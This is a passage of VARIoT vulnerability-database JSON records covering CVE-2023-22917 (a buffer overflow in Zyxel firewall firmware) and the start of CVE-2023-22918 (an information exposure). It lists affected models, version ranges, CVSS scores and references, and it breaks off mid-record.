                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.32",
                        "versionStartIncluding": "5.10",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-22917"
          }
        ]
      },
      "cve": "CVE-2023-22917",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.5,
                "baseSeverity": "High",
                "confidentialityImpact": "None",
                "exploitabilityScore": null,
                "id": "CVE-2023-22917",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2023-22917",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2023-22917",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202304-1907",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009323"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22917"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22917"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1907"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A buffer overflow vulnerability in the \u201csdwan_iface_ipc\u201d binary of Zyxel ATP series firmware versions 5.10 through 5.32, USG FLEX series firmware versions 5.00 through 5.32, USG FLEX 50(W) firmware versions 5.10 through 5.32, USG20(W)-VPN firmware versions 5.10 through 5.32, and VPN series firmware versions 5.00 through 5.35, which could allow a remote unauthenticated attacker to cause a core dump with a request error message on a vulnerable device by uploading a crafted configuration file. usg flex 100 firmware, usg flex 100w firmware, USG FLEX 200 firmware etc. ZyXEL The product contains a classic buffer overflow vulnerability.Service operation interruption (DoS) It may be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-22917"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009323"
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-22917"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2023-22917",
            "trust": 3.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009323",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1907",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-22917",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-22917"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009323"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22917"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1907"
          }
        ]
      },
      "id": "VAR-202304-1936",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.3125
      },
      "last_update_date": "2023-12-18T13:00:10.317000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel ATP Security vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=236007"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1907"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-120",
            "trust": 1.0
          },
          {
            "problemtype": "Classic buffer overflow (CWE-120) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009323"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22917"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-vulnerabilities-of-firewalls-and-aps"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-22917"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2023-22917/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-22917"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009323"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22917"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1907"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2023-22917"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009323"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22917"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1907"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-04-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-22917"
          },
          {
            "date": "2023-12-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-009323"
          },
          {
            "date": "2023-04-24T17:15:09.833000",
            "db": "NVD",
            "id": "CVE-2023-22917"
          },
          {
            "date": "2023-04-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202304-1907"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-04-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-22917"
          },
          {
            "date": "2023-12-05T05:26:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-009323"
          },
          {
            "date": "2023-05-04T13:28:13.717000",
            "db": "NVD",
            "id": "CVE-2023-22917"
          },
          {
            "date": "2023-05-06T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202304-1907"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1907"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0ZyXEL\u00a0 Classic buffer overflow vulnerability in the product",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009323"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202304-1907"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202304-1973

    Vulnerability from variot - Updated: 2023-12-18 12:54

    A post-authentication information exposure vulnerability in the CGI program of Zyxel ATP series firmware versions 4.32 through 5.35, USG FLEX series firmware versions 4.50 through 5.35, USG FLEX 50(W) firmware versions 4.16 through 5.35, USG20(W)-VPN firmware versions 4.16 through 5.35, VPN series firmware versions 4.30 through 5.35, NWA110AX firmware version 6.50(ABTG.2) and earlier versions, WAC500 firmware version 6.50(ABVS.0) and earlier versions, and WAX510D firmware version 6.50(ABTF.2) and earlier versions, which could allow a remote authenticated attacker to retrieve encrypted information of the administrator on an affected device. ATP200 firmware, ATP100 firmware, ATP700 firmware etc. ZyXEL There are unspecified vulnerabilities in the product.Information may be obtained

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202304-1973",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "nap303",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.28\\(abex.0\\)"
          },
          {
            "model": "atp500",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "nwa1123acv3",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(abvt.0\\)"
          },
          {
            "model": "wac6503d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.28\\(aasf.0\\)"
          },
          {
            "model": "atp700",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "wac6502d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.28\\(aase.0\\)"
          },
          {
            "model": "usg flex 500",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg20-vpn",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "wac6553d-e",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.28\\(aasg.0\\)"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "wac6103d-i",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.28\\(aaxh.0\\)"
          },
          {
            "model": "nwa1123-ac hd",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abin.9\\)"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "wax655e",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(acdo.2\\)"
          },
          {
            "model": "wac500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(abvs.0\\)"
          },
          {
            "model": "nwa50ax-pro",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(acge.0\\)"
          },
          {
            "model": "wax620d-6e",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(accn.2\\)"
          },
          {
            "model": "nwa1123-ac-pro",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.28\\(abhd.0\\)"
          },
          {
            "model": "vpn300",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "nwa210ax",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(abtd.2\\)"
          },
          {
            "model": "usg flex 50w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.16"
          },
          {
            "model": "atp100w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "nap353",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.28\\(abey.0\\)"
          },
          {
            "model": "wax610d",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(abte.2\\)"
          },
          {
            "model": "vpn100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "wax650s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(abrm.2\\)"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "wac500h",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(abwa.0\\)"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "nwa5123-ac hd",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abim.9\\)"
          },
          {
            "model": "nwa50ax",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.55\\(acge.1\\)"
          },
          {
            "model": "nap203",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.28\\(abfa.0\\)"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "nwa110ax",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(abtg.2\\)"
          },
          {
            "model": "vpn1000",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "nwa90ax",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.29\\(accv.1\\)"
          },
          {
            "model": "usg flex 100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg 20w-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.16"
          },
          {
            "model": "usg flex 50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 700",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "nwa55axe",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.29\\(abzl.1\\)"
          },
          {
            "model": "vpn50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 100w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp800",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "wac5302d-sv2",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abvz.9\\)"
          },
          {
            "model": "wac6303d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.25\\(abgl.9\\)"
          },
          {
            "model": "usg flex 50w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "wac6552d-s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.28\\(abio.0\\)"
          },
          {
            "model": "wac6502d-e",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.28\\(aasd.0\\)"
          },
          {
            "model": "nwa220ax-6e",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(acco.2\\)"
          },
          {
            "model": "wax510d",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(abtf.2\\)"
          },
          {
            "model": "wax640s-6e",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(accm.2\\)"
          },
          {
            "model": "usg20-vpn",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg flex 200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "nwa90ax-pro",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(acgf.0\\)"
          },
          {
            "model": "wax630s",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "6.50\\(abzd.2\\)"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "atp100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg 20-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn1000",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "nap203",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg20-vpn",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp800",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn300",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-009355"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-22918"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
